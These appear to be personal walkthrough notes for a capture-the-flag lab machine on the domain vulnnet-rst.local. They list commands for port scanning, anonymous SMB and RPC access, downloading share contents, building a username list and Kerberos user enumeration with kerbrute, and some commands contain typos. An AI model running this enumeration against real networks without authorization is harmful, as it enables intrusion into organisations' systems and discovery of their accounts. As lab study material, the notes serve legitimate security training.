nmap -p- -Pn $target -v --min-rate 1000 --max-rtt-timeout 1000ms --max-retries 5 
-oN nmap_ports.txt 
# PORT 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP), 464, 593 

# connects to a Windows machine's RPC service without a password.
rcpclient -N $target 
 
#List what is share in this server 
smbclient -N -L \\\\\\\\$target\\\\ -U ''
# -L list mode just show what shares are available
# The UNC path with backslashes (or // format) is required 
smbclient -N -L \\\\\\\\$target\\\\ 

# Samething different format 
smbclient \\\\\\\\$target\\\\VulnNet-Business-Sharing
smbclient -U "" //$target/VulnNet-Business-Anonymous
smbclient -U "" //$target/VulnNet-Enterprise-Anonymous

#This downloads all three files to your current local directory on Kali.
mget *
smbclient -U "" //$target/VulnNet-Business-Anonymous 
mget *
cat Enterprise-Operations.txt #all other files # see name in files 
# copy name and put in usernames.txt 
nano usernames.txt 
cat usernames.txt >> /usr/share/seclists/Usernames/Names/names.txt

erbrute userenum /usr/share/seclists/Usernames/Names/names.txt --dc $target -d vulnnet-rst.local

<aside> 💡

So if you've ever used an FTP client, the commands feel familiar:

ls → list files (same as FTP) get → download one file (same as FTP) mget → download multiple files (same as FTP) put → upload one file (same as FTP) mput → upload multiple files (same as FTP) cd → change directory (same as FTP) exit → quit (same as FTP)

</aside>

kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt --dc $target -d vulnnet-rst.local